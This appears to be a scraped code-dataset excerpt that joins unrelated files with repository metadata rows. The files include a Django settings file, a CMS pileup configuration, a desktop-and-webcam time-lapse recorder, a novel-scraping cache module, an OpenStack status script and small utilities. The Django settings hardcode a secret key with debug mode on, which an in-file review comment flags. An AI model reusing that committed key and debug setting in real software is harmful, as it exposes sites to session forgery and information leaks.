    np.copyto(flat_view[index * size:(index + 1) * size], payload)
def write_tuple_to_shared_memory(index, values, shared_memory, space):
    """Write each element of a Tuple observation into its own buffer."""
    for val, mem, sub in zip(values, shared_memory, space.spaces):
        write_to_shared_memory(index, val, mem, sub)
def write_dict_to_shared_memory(index, values, shared_memory, space):
    """Write each keyed element of a Dict observation into its buffer."""
    for key, sub in space.spaces.items():
        write_to_shared_memory(index, values[key], shared_memory[key], sub)
| [
"shawn@DNa1c068f.SUNet"
] | shawn@DNa1c068f.SUNet |
2cfce4c854012a75cc66bb76be74ba258699c121 | 55477438db40d977c78292ca89af3a517139dbff | /login_and_reg/settings.py | ac2441384f52b35ca46734d39739ee5aef535132 | [] | no_license | Wilsonbluong/The-Wall | aa1528df6eb7f07c5092dfa9db8d258443bbb71c | 3524ed0b716804d3bc7cc791d6ff7a80d4551702 | refs/heads/master | 2023-01-06T02:05:21.361078 | 2020-10-22T18:56:38 | 2020-10-22T18:56:38 | 306,432,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,126 | py | """
Django settings for login_and_reg project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; load it from an
# environment variable before any production deployment.
SECRET_KEY = '*ke@0&$j7s2a=3fhkc(i-71w0_4-j21u=9vo=o+f!r9axia!8y'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list is only acceptable while DEBUG is True; add real hostnames for production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'login_app',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'login_and_reg.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'login_and_reg.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"wilsonbluong@gmail.com"
] | wilsonbluong@gmail.com |
1b8eaa30f76e70cfc285f4f677afdfc236302cae | ee692010c2596a31848b0273db1d054e3fb0d208 | /MetaData/python/PU_MixFiles_2017_miniaodv2_310/mix_2017MC_GJets_HT-40To100_TuneCP5_13TeV-madgraphMLM-pythia8.py | 4ae63072d88142e6f1113a614b3070efeef65e66 | [] | no_license | cms-analysis/flashgg | 67e2dca6070e7a0e876d19d9b3ad6b021485bf28 | 4edea8897e2a4b0518dca76ba6c9909c20c40ae7 | refs/heads/dev_legacy_runII | 2023-06-18T05:40:10.010854 | 2023-05-30T07:53:40 | 2023-05-30T07:53:40 | 20,220,358 | 27 | 205 | null | 2023-05-30T07:53:42 | 2014-05-27T13:10:32 | C++ | UTF-8 | Python | false | false | 3,048 | py | import FWCore.ParameterSet.Config as cms
# configuration to model pileup for initial physics phase
from SimGeneral.MixingModule.mixObjects_cfi import theMixObjects
from SimGeneral.MixingModule.mixPoolSource_cfi import *
from SimGeneral.MixingModule.digitizers_cfi import *
mix = cms.EDProducer("MixingModule",
digitizers = cms.PSet(theDigitizers),
LabelPlayback = cms.string(''),
maxBunch = cms.int32(3),
minBunch = cms.int32(-12), ## in terms of 25 nsec
bunchspace = cms.int32(25), ##ns
mixProdStep1 = cms.bool(False),
mixProdStep2 = cms.bool(False),
playback = cms.untracked.bool(False),
useCurrentProcessOnly = cms.bool(False),
input = cms.SecSource("EmbeddedRootSource",
type = cms.string('probFunction'),
nbPileupEvents = cms.PSet(
probFunctionVariable = cms.vint32(0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99),
probValue = cms.vdouble(
0.0186132,0.000399219,0.00124014,0.0013149,0.00118849,0.00138384,0.00113352,0.00121015,0.00231722,0.00178472,0.00229306,0.00312774,0.00435684,0.00657119,0.00870848,0.0110405,0.0137307,0.0163249,0.0192129,0.0217532,0.0235267,0.0244565,0.0253839,0.0260153,0.0268241,0.0280434,0.029164,0.0292138,0.0287353,0.0289874,0.0284372,0.0291111,0.0289168,0.0284458,0.0281134,0.0273704,0.0267777,0.0250286,0.0246389,0.02363,0.0219221,0.0196755,0.0179232,0.0163309,0.0146499,0.0138694,0.0124274,0.0119393,0.0115549,0.0119637,0.0119622,0.0120341,0.011665,0.012052,0.0116119,0.0119076,0.0116807,0.0117792,0.0111979,0.0104097,0.00903356,0.00768429,0.00668635,0.00526191,0.0042346,0.00341179,0.00292782,0.00248153,0.00167935,0.00139217,0.00102127,0.000805727,0.00072326,0.000235117,0.000494599,0.000481479,0.000421502,6.12261e-05,4.18587e-05,0.000995445,0.000616218,0.000109541,0.000330288,5.16465e-05,0.000327789,0.000326748,7.70533e-05,2.04087e-05,0.00094359,6.24756e-07,6.24756e-07,4.16504e-07,4.16504e-07,4.16504e-07,0,1.04126e-06,2.70728e-06,6.24756e-07,6.24756e-07,3.26956e-05
),
histoFileName = cms.untracked.string('histProbFunction.root'),
),
sequential = cms.untracked.bool(False),
manage_OOT = cms.untracked.bool(True), ## manage out-of-time pileup
## setting this to True means that the out-of-time pileup
## will have a different distribution than in-time, given
## by what is described on the next line:
OOT_type = cms.untracked.string('Poisson'), ## generate OOT with a Poisson matching the number chosen for in-time
#OOT_type = cms.untracked.string('fixed'), ## generate OOT with a fixed distribution
#intFixed_OOT = cms.untracked.int32(2),
fileNames = FileNames
),
mixObjects = cms.PSet(theMixObjects)
)
| [
"noreply@github.com"
] | cms-analysis.noreply@github.com |
94a36e04ac2d6a5b3d6282e7a6e18b4676c908cc | 39502ddee170646c55fc13b01626a51f08c9b02b | /main.py | 88bc403d25f54bbc912895c21b6786cdfc90a30c | [
"MIT"
] | permissive | PWN0N/Working-Time-lapse | 9688c8a8210a72654862582c96e1dd107a0670ed | 1ebe4cb1a669a1b77528b4f2583e27fdd4e5953b | refs/heads/master | 2020-12-07T23:35:45.072572 | 2020-01-09T14:57:13 | 2020-01-09T14:57:13 | 232,826,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | import signal
import numpy as np
from PIL import ImageGrab
import cv2
import time
import sys
import os
flips_time_mins = 30
interval = 5 # seconds
num_frames = flips_time_mins*60/interval
num_frames = int(num_frames)
year = -1
month = -1
day = -1
out_fps = 24
cammode = 0
shutdown_msg = False
def signal_handler(signal, frame):
    """SIGINT handler: announce shutdown and flag the capture loop to stop."""
    global shutdown_msg
    print('You Pressed Ctrl+C, The Program Will Be Shutdown')
    shutdown_msg = True
    print('Saving Videos')
def add_timestamp(img):
    # Overlay the current wall-clock time on the frame, in place, and return it.
    time_str= time.strftime("%Y-%m-%d %H:%M:%S")
    color=(255,255,255)
    # If the sampled patch is bright (mean > 128), switch to black text for contrast.
    # NOTE(review): the sampled region [700:780, 900:950] and the text anchor
    # (900, 700) assume frames of at least 780x950 — confirm against the
    # actual capture/desktop resolution.
    if np.mean( img[700:780,900:950])>128:
        color=(0,0,0)
    cv2.putText(img, time_str, (900, 700) ,cv2.FONT_HERSHEY_SIMPLEX ,0.8, color ,2)
    return img
capture = cv2.VideoCapture(0)
capture1 = cv2.VideoCapture(1)
cam, _ = capture.read()
cam1, _ = capture1.read()
if(cam and cam1):
print('Dual Camera Mode')
cammode = 1
elif(cam):
print('Single Camera Mode')
cammode = 2
else:
print('No Camera Detect!')
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
# capture frames to video
while True:
if(day != time.strftime("%d")):
year = time.strftime("%Y")
month = time.strftime("%m")
day = time.strftime("%d")
hour = time.strftime("%H")
save_dir = "{0}/{1}/{2}".format(year, month, day)
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
# innner camera init
size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
codec = cv2.VideoWriter.fourcc('M', 'J', 'P', 'G')
cam_filename = save_dir+"/cam_{:4}.avi".format(time.strftime("%H%M"))
video = cv2.VideoWriter(cam_filename, codec, out_fps, size)
# for low quality webcams, discard the starting unstable frames
for i in range(20):
capture.read()
# desktop screen init
desktopim = np.array(ImageGrab.grab().convert('RGB'))
# desktopFrame =np.array(desktopim.getdata(),dtype='uint8')\
# .reshape((desktopim.size[1],desktopim.size[0],3))
sp = desktopim.shape
sz1 = sp[0] # height(rows) of image
sz2 = sp[1] # width(colums) of image
desktopsize = (int(sz2),int(sz1))
codec = cv2.VideoWriter.fourcc('M', 'J', 'P', 'G')
desktop_filename = save_dir+"/desktop_{:4}.avi".format(time.strftime("%H%M"))
desktopvideo = cv2.VideoWriter(desktop_filename, codec, out_fps, desktopsize)
# outter camera init
if (cammode == 1):
size1 = (int(capture1.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(capture1.get(cv2.CAP_PROP_FRAME_HEIGHT)))
cam1_filename = save_dir+"/cam1_{:4}.avi".format(time.strftime("%H%M"))
video1 = cv2.VideoWriter(cam1_filename, codec, out_fps, size1)
# for low quality webcams, discard the starting unstable frames
for i in range(20):
capture1.read()
for i in range(num_frames):
if (shutdown_msg):
break
_, frame = capture.read()
video.write(add_timestamp(frame))
desktopim = np.array(ImageGrab.grab().convert('RGB'))
# ImageGrab and OpenCV have different color space
desktopFrame = cv2.cvtColor(desktopim, cv2.COLOR_BGR2RGB)
desktopvideo.write(add_timestamp(desktopFrame))
if (cammode == 1):
_, frame1 = capture1.read()
video1.write(add_timestamp(frame1))
time.sleep(interval)
video.release()
desktopvideo.release()
if (cammode == 1):
video1.release()
if (shutdown_msg):
break
capture.release()
if(cammode ==1):
capture1.release()
print('Done!')
print('Exit The Program')
sys.exit(0)
| [
"juangshin@gmail.com"
] | juangshin@gmail.com |
dc406b8fcccc1b7a9739c3696ab62e5757aea49e | cbb7ac0cc690c2d3af1873a876cda7ea99776424 | /owllook/fetcher/cache.py | fdccbe18e5fe86cc3c409c844afb886bf7c1dbf6 | [
"Apache-2.0"
] | permissive | demidroid/owllook | 8c4dfab3d18da3d8af143f3d78e378e74e8c4fc0 | eb385b34af3acad55829c5584dc69b7275cc398f | refs/heads/master | 2021-05-14T10:46:24.722794 | 2017-09-18T12:43:12 | 2017-09-18T12:43:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,187 | py | #!/usr/bin/env python
import aiohttp
import asyncio
import re
import async_timeout
from bs4 import BeautifulSoup
from aiocache.serializers import PickleSerializer
from aiocache.log import logger
from aiocache.utils import get_args_dict, get_cache
from urllib.parse import urlparse, parse_qs
from owllook.database.mongodb import MotorBase
from owllook.fetcher.baidu_novels import baidu_search
from owllook.fetcher.so_novels import so_search
from owllook.fetcher.function import target_fetch, get_time, requests_target_fetch
from owllook.fetcher.extract_novels import extract_pre_next_chapter
from owllook.config import RULES, LATEST_RULES, LOGGER
# Token from https://github.com/argaen/aiocache/blob/master/aiocache/decorators.py
def cached(
        ttl=0, key=None, key_from_attr=None, cache=None, serializer=None, plugins=None, **kwargs):
    """
    Cache an async function's return value under a key built from module name,
    function name and call arguments.

    Extra backend options (e.g. endpoint/port for RedisCache) may be passed as
    **kwargs and are forwarded to the cache constructor.

    :param ttl: int seconds to store the function call. 0 means no expiration.
    :param key: str value to use as the cache key. Takes precedence over
        ``key_from_attr``. If neither is given, the key is
        module_name + function_name + str(args) + str(kwargs).
    :param key_from_attr: arg or kwarg name of the function whose value is the key.
    :param cache: cache class used for ``set``/``get``; defaults to
        ``aiocache.settings.DEFAULT_CACHE``.
    :param serializer: serializer instance for ``dumps``/``loads``; defaults to
        ``aiocache.settings.DEFAULT_SERIALIZER``.
    :param plugins: plugins invoked on cmd hooks; defaults to
        ``aiocache.settings.DEFAULT_PLUGINS``.
    """
    # Local import so the module's top-level import block stays untouched.
    from functools import wraps

    cache_kwargs = kwargs

    def cached_decorator(func):
        # wraps() preserves func.__name__/__doc__ — without it every cached
        # coroutine reported itself as "wrapper" in logs and introspection.
        @wraps(func)
        async def wrapper(*args, **kwargs):
            cache_instance = get_cache(
                cache=cache, serializer=serializer, plugins=plugins, **cache_kwargs)
            args_dict = get_args_dict(func, args, kwargs)
            # Key precedence: explicit `key` > the `key_from_attr` argument's
            # value > module + function name + repr of the call arguments.
            cache_key = key or args_dict.get(
                key_from_attr,
                (func.__module__ or 'stub') + func.__name__ + str(args) + str(kwargs))

            try:
                if await cache_instance.exists(cache_key):
                    return await cache_instance.get(cache_key)
            except Exception:
                # A broken cache backend must not break the wrapped call.
                logger.exception("Unexpected error with %s", cache_instance)

            result = await func(*args, **kwargs)
            # Only truthy results are cached, so None/empty failures get retried.
            if result:
                try:
                    await cache_instance.set(cache_key, result, ttl=ttl)
                except Exception:
                    logger.exception("Unexpected error with %s", cache_instance)

            return result

        return wrapper

    return cached_decorator
@cached(ttl=300, key_from_attr='url', serializer=PickleSerializer(), namespace="main")
async def cache_owllook_novels_content(url, netloc):
    """Fetch one chapter page and return its content plus navigation info.

    Cached per URL for 5 minutes. Returns a dict with keys 'content'
    (joined HTML of the matched nodes), 'next_chapter' (prev/next links from
    extract_pre_next_chapter) and 'title', or None when the fetch fails or
    the site selector matches nothing.
    """
    async with aiohttp.ClientSession() as client:
        html = await target_fetch(client=client, url=url)
        if html:
            soup = BeautifulSoup(html, 'html5lib')
            # Site-specific selector from RULES: id wins over class, else tag name.
            selector = RULES[netloc].content_selector
            if selector.get('id', None):
                content = soup.find_all(id=selector['id'])
            elif selector.get('class', None):
                content = soup.find_all(class_=selector['class'])
            else:
                content = soup.find_all(selector.get('tag'))
            if content:
                # Extract the real chapter title (e.g. "第12章 ...") from the
                # page <title>; fall back to the raw title when no match.
                title_reg = r'(第?\s*[一二两三四五六七八九十○零百千万亿0-91234567890]{1,6}\s*[章回卷节折篇幕集]\s*.*?)[_,-]'
                title = soup.title.string
                extract_title = re.findall(title_reg, title, re.I)
                title = extract_title[0] if extract_title else title
                next_chapter = extract_pre_next_chapter(chapter_url=url, html=str(soup))
                content = [str(i) for i in content]
                data = {
                    'content': ''.join(content),
                    'next_chapter': next_chapter,
                    'title': title
                }
            else:
                data = None
            return data
    return None
@cached(ttl=300, key_from_attr='url', serializer=PickleSerializer(), namespace="main")
async def cache_owllook_novels_chapter(url, netloc):
    """Fetch a chapter-list page and return the selected nodes as a string.

    Cached per URL for 5 minutes; returns None when the fetch fails or the
    site-specific selector matches nothing.
    """
    async with aiohttp.ClientSession() as client:
        html = await target_fetch(client=client, url=url)
        if not html:
            return None
        soup = BeautifulSoup(html, 'html5lib')
        # Selector precedence mirrors the site rules: id, then class, then tag.
        selector = RULES[netloc].chapter_selector
        if selector.get('id'):
            matches = soup.find_all(id=selector['id'])
        elif selector.get('class'):
            matches = soup.find_all(class_=selector['class'])
        else:
            matches = soup.find_all(selector.get('tag'))
        return str(matches) if matches else None
@cached(ttl=86400, key_from_attr='novels_name', serializer=PickleSerializer(), namespace="novels_name")
async def cache_owllook_baidu_novels_result(novels_name):
    """Search Baidu for a novel name; cache the non-empty hits for a day."""
    hits = [item for item in await baidu_search(novels_name) if item]
    return hits or None
@cached(ttl=86400, key_from_attr='novels_name', serializer=PickleSerializer(), namespace="novels_name")
async def cache_owllook_so_novels_result(novels_name):
    """Search so.com for a novel name; cache the non-empty hits for a day."""
    hits = [item for item in await so_search(novels_name) if item]
    return hits or None
@cached(ttl=10800, key_from_attr='search_ranking', serializer=PickleSerializer(), namespace="ranking")
async def cache_owllook_search_ranking():
    # Top-25 search keywords (each searched at least 50 times), ranked by
    # descending count; cached for three hours. Each item carries its
    # 1-based rank as 'index'.
    motor_db = MotorBase().db
    keyword_cursor = motor_db.search_records.find(
        {'count': {'$gte': 50}},
        {'keyword': 1, 'count': 1, '_id': 0}
    ).sort('count', -1).limit(25)
    result = []
    index = 1
    # Manual counter: enumerate() cannot wrap an async cursor directly.
    async for document in keyword_cursor:
        result.append({'keyword': document['keyword'], 'count': document['count'], 'index': index})
        index += 1
    return result
@cached(ttl=3600, key_from_attr='search_ranking', serializer=PickleSerializer(), namespace="ranking")
async def cache_others_search_ranking(spider='qidian', novel_type='全部类别'):
    # Pre-scraped ranking for a given source site ("spider") and novel
    # category; cached for one hour. Returns the raw mongo projection
    # ({'data': ...}) or None when no ranking has been stored.
    motor_db = MotorBase().db
    item_data = await motor_db.novels_ranking.find_one({'spider': spider, 'type': novel_type}, {'data': 1, '_id': 0})
    return item_data
async def get_the_latest_chapter(chapter_url, loop=None):
    """Scrape a book page for its newest chapter and persist the result.

    `chapter_url` is an owllook URL whose query string carries the real
    target `url` and `novels_name`. Returns a dict describing the latest
    chapter (also upserted into mongo `latest_chapter`), or None on any
    failure or when the site has no LATEST_RULES entry.
    """
    try:
        with async_timeout.timeout(60):
            url = parse_qs(urlparse(chapter_url).query).get('url', '')
            novels_name = parse_qs(urlparse(chapter_url).query).get('novels_name', '')
            data = None
            if url and novels_name:
                # parse_qs returns lists; take the first value of each.
                url = url[0]
                novels_name = novels_name[0]
                netloc = urlparse(url).netloc
                if netloc in LATEST_RULES.keys():
                    async with aiohttp.ClientSession(loop=loop) as client:
                        try:
                            html = await target_fetch(client=client, url=url)
                            if html is None:
                                # Fall back to the blocking requests-based fetcher.
                                html = requests_target_fetch(url=url)
                        except TypeError:
                            html = requests_target_fetch(url=url)
                        except Exception as e:
                            LOGGER.exception(e)
                            return None
                    try:
                        soup = BeautifulSoup(html, 'html5lib')
                    except Exception as e:
                        LOGGER.exception(e)
                        return None
                    latest_chapter_name, latest_chapter_url = None, None
                    if LATEST_RULES[netloc].plan:
                        # Plan A: read chapter name/url from <meta property=...> tags.
                        meta_value = LATEST_RULES[netloc].meta_value
                        latest_chapter_name = soup.select(
                            'meta[property="{0}"]'.format(meta_value["latest_chapter_name"]))
                        latest_chapter_name = latest_chapter_name[0].get('content',
                                                                         None) if latest_chapter_name else None
                        latest_chapter_url = soup.select(
                            'meta[property="{0}"]'.format(meta_value["latest_chapter_url"]))
                        latest_chapter_url = latest_chapter_url[0].get('content',
                                                                       None) if latest_chapter_url else None
                    else:
                        # Plan B: select the newest chapter link via id/class/tag rules.
                        selector = LATEST_RULES[netloc].selector
                        content_url = selector.get('content_url')
                        if selector.get('id', None):
                            latest_chapter_soup = soup.find_all(id=selector['id'])
                        elif selector.get('class', None):
                            latest_chapter_soup = soup.find_all(class_=selector['class'])
                        else:
                            latest_chapter_soup = soup.select(selector.get('tag'))
                        if latest_chapter_soup:
                            if content_url == '1':
                                # TODO
                                pass
                            elif content_url == '0':
                                # TODO
                                pass
                            else:
                                # Default: prefix the rule's base URL onto the href.
                                latest_chapter_url = content_url + latest_chapter_soup[0].get('href', None)
                                latest_chapter_name = latest_chapter_soup[0].get('title', None)
                    if latest_chapter_name and latest_chapter_url:
                        time_current = get_time()
                        data = {
                            "latest_chapter_name": latest_chapter_name,
                            "latest_chapter_url": latest_chapter_url,
                            "owllook_chapter_url": chapter_url,
                            "owllook_content_url": "/owllook_content?url={latest_chapter_url}&name={name}&chapter_url={chapter_url}&novels_name={novels_name}".format(
                                latest_chapter_url=latest_chapter_url,
                                name=latest_chapter_name,
                                chapter_url=url,
                                novels_name=novels_name,
                            ),
                        }
                        # Store the latest chapter (upsert keyed on book + owllook URL).
                        motor_db = MotorBase().db
                        await motor_db.latest_chapter.update_one(
                            {"novels_name": novels_name, 'owllook_chapter_url': chapter_url},
                            {'$set': {'data': data, "finished_at": time_current}}, upsert=True)
            return data
    except Exception as e:
        LOGGER.exception(e)
        return None
async def update_all_books(loop):
    """Refresh the latest-chapter cache for every book on every user's shelf.

    Iterates all `user_message` documents, deduplicates book URLs, and calls
    get_the_latest_chapter() for each with a 20 s cap per URL. Returns False
    on an unexpected top-level failure, otherwise None.
    """
    try:
        motor_db = MotorBase().db
        # Cursor over every user's bookshelf links.
        books_url_cursor = motor_db.user_message.find({}, {'books_url.book_url': 1, '_id': 0})
        book_urls = []
        already_urls = set()
        async for document in books_url_cursor:
            if document:
                books_url = document['books_url']
                for book_url in books_url:
                    chapter_url = book_url['book_url']
                    # Skip URLs already refreshed during this run.
                    if chapter_url not in already_urls:
                        try:
                            with async_timeout.timeout(20):
                                await get_the_latest_chapter(chapter_url, loop)
                        except Exception as e:
                            LOGGER.exception(e)
                        already_urls.add(chapter_url)
                # Alternative batch (gather) implementation, kept disabled:
                # book_urls += [book_url['book_url'] for book_url in books_url]
        # url_tasks = [get_the_latest_chapter(each_url, loop) for each_url in set(book_urls)]
        # tasks = [asyncio.ensure_future(i) for i in url_tasks]
        # try:
        #     await asyncio.gather(*tasks)
        # except asyncio.TimeoutError as e:
        #     pass
    except Exception as e:
        LOGGER.exception(e)
        return False
| [
"xiaozizayang@gmail.com"
] | xiaozizayang@gmail.com |
d0ecd64306843d99786527eb755a6f027b3eabf0 | 6b0474d4402c8c64264658472dce4880fdf5faa7 | /server/env/bin/pip | 8a9c5f33980e8ad281ccd0474633414177c48993 | [] | no_license | ndanekov/SoundEtitor | a6603856d2befa2618510fc28e5bc54aaea82b48 | f8bb5df23db107ffe1c580761688cfbeeb5e1586 | refs/heads/master | 2021-05-23T10:09:51.890871 | 2020-04-24T11:45:24 | 2020-04-24T11:45:24 | 253,235,032 | 0 | 0 | null | 2021-01-05T23:51:18 | 2020-04-05T12:56:38 | Python | UTF-8 | Python | false | false | 264 | #!/home/demo/webapps/SoundEditor/server/env/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main

# Generated console-script entry point for pip.
if __name__ == '__main__':
    # Strip the "-script.pyw" / ".exe" suffix that setuptools shims can
    # leave in argv[0] before handing control to pip's CLI.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"ndanekov@visteon.com"
] | ndanekov@visteon.com | |
0de89bf37b2188627d7e101337a48dc428a6e524 | 0ddc60e3df2e8017c934fef4c4c50e757a3a1093 | /bookpatient/urls.py | cfe46b25c848084d440d2b4e066e9f8709404da1 | [] | no_license | AyanNandaGoswami/OnlineBedBookingSystem | 46ac8d155774bba89f2785bf5a44095b7214859f | 922aa61d05ef9942f3134e8f6eb870916beb8b37 | refs/heads/master | 2023-04-26T15:32:47.535157 | 2021-05-24T13:30:27 | 2021-05-24T13:30:27 | 365,438,714 | 1 | 0 | null | 2021-05-24T13:30:29 | 2021-05-08T06:36:12 | JavaScript | UTF-8 | Python | false | false | 173 | py | from django.urls import path
from .api import BookBedAPI
app_name = 'bookpatient'
urlpatterns = [
path('add-new-bed/', BookBedAPI.as_view(), name='book_new_bed'),
]
| [
"ayan02472@gmail.com"
] | ayan02472@gmail.com |
8a1c7f9881a66c19227307b4c8279944234b51da | 232e351b56bd0f281219459255d14b25f2743df9 | /skintonemodel.py | 0d504609afe085aa04a740bdcab32f24f72aae17 | [] | no_license | Fox520/RandomScripts | 9e083d5c03668b924bf77b0eb83c42c9d263e8c0 | 9939c616615faf87b05fda562d8cb6c84cd1adf8 | refs/heads/master | 2022-11-19T01:14:13.340451 | 2020-07-09T09:01:47 | 2020-07-09T09:01:47 | 275,651,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("out.csv")
# Frequency of each skin-tone label in the dataset.
hsn_counts = dict(df["Client Skin Tone"].value_counts())
fig, ax = plt.subplots()
keys = list(hsn_counts.keys())
values = list(hsn_counts.values())
ax.bar(keys, values, label="count")
# Annotate each bar with its exact count.
for a, b in zip(keys, values):
    plt.text(a, b, str(b))
ax.set_title("Client Skin Tone")
ax.legend()
plt.show()
| [
""
] | |
82b51fe93c8b41331689f871b18a4710ae4130c9 | 3e7000dfb8d818ffd439a6bd20b86cc616ec93ab | /BinaryTreeToBinarySearchTree.py | a6fdd94e54918b478f2dd66f232fe40409aa2ab3 | [] | no_license | marsunique/LeetCodeOJ | 56c32f27a5eeb88f6c932d3c224fef6aa572036f | 2bcd0f6a704346cdac4ecccd6c0baef579d38fac | refs/heads/master | 2021-01-24T11:00:43.864200 | 2017-12-04T15:06:13 | 2017-12-04T15:06:13 | 70,289,177 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | # 1) Create a temp array arr[] that stores inorder traversal of the tree. This step takes O(n) time.
# 2) Sort the temp array arr[]. Time complexity of this step depends upon the sorting algorithm. In the following implementation, Quick Sort is used which takes (n^2) time. This can be done in O(nLogn) time using Heap Sort or Merge Sort.
# 3) Again do inorder traversal of tree and copy array elements to tree nodes one by one. This step takes *O(n) time. (*Not really, nodes.pop(0) also takes time)
def binaryTreeToBST(root):
    """Convert a binary tree to a BST in place, preserving its shape.

    Collects the node values via an inorder walk (storePreOrder), sorts
    them, then writes them back in inorder (buildBST), which yields a valid
    BST over the same nodes. Returns None; the tree is modified in place.
    """
    if not root:
        return None
    nodes = []
    storePreOrder(root, nodes)
    nodes.sort()
    buildBST(root, nodes)
def storePreOrder(root, nodes):
    """Append every node value to `nodes` in *inorder* (despite the name).

    Iterative inorder traversal with an explicit stack; mutates `nodes`
    and returns None.
    """
    stack, current = [], root
    while stack or current:
        while current:
            stack.append(current)
            current = current.left
        current = stack.pop()
        nodes.append(current.val)
        current = current.right
def buildBST(root, nodes):
if not root:
return
buildBST(root.left, nodes)
root.val = nodes.pop(0)
buildBST(root.right, nodes) | [
"marsunique@gmail.com"
] | marsunique@gmail.com |
49ff6d0647e90328d83dcb70674c331fa8cdfba9 | bc208f555386f71c27668d6b470ccf77941be288 | /build/FlaskApp/utility/Status.py | 60a9a74c3d18b0baba531163eb6780bf30a8e4ac | [] | no_license | sohan99/openstackVM | f9ae8b63bdf571ff5ad19b3b128adc4fa77d7c8f | a4598a82fc0e82f0d1824cd8bad5d681cbf61723 | refs/heads/master | 2016-09-06T11:38:01.438271 | 2015-10-13T20:51:07 | 2015-10-13T20:51:07 | 42,589,521 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py |
import sys, getopt
import configReader
import LogDump
from novaclient import client
import novaclient.exceptions
class status:
def __init__(self):
authDict = {}
KEY_FILE = "key.conf"
try:
authDict = configReader.readConfigFile(KEY_FILE,"KeystoneAuth")
self.nova=client.Client(authDict['versionnumber'], authDict['username'], authDict['password'], authDict['tennantname'], authDict['authurl'])
print "initialized nova object "
except:
print "ERROR Occured while initializing nova object"
def getStatus(self):
statusDict={}
statusDict['error'] = "GOOD"
try:
instance = self.nova.servers.list()
names=[]
statuses=[]
console_url=[]
count=0
for each in instance:
names.append(str(each.name));
statuses.append(str(each.status));
if statuses[count] == "ACTIVE":
console_url.append(str(each.get_vnc_console('novnc')['console']['url']));
else :
console_url.append("");
count=count+1;
statusDict["count"] = count;
statusDict["names"] = names;
statusDict["status"] = statuses;
statusDict["url"] = console_url;
except :
statusDict['error']="error"
print statusDict
return str(statusDict);
if __name__ == '__main__':
x=status()
x.getStatus(); | [
"sohanspoojary99@gmail.com"
] | sohanspoojary99@gmail.com |
d38341b1d1618080340bdc9c5cee50ce678b5380 | 9577168f8a3206199d1be7c388b88d0458b4c1ed | /createapi.py | 3cea52fadc3aeba83ec6640ef0644f711ebaa605 | [] | no_license | julie-norris/interview-take-home-challenges | 4a3f297ad26e7e688b6e03c0cc39c63a9e68a5d9 | 14de8cb72ebe6b6cf4e7bb330e20f372e07c8a68 | refs/heads/master | 2020-04-02T19:49:52.611353 | 2018-12-13T23:22:17 | 2018-12-13T23:22:17 | 154,747,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,795 | py | from flask import Flask, request, jsonify, render_template, flash, session, redirect
from flask_restful import Api, Resource,reqparse
from datetime import date, time
from datetime import datetime
import uuid
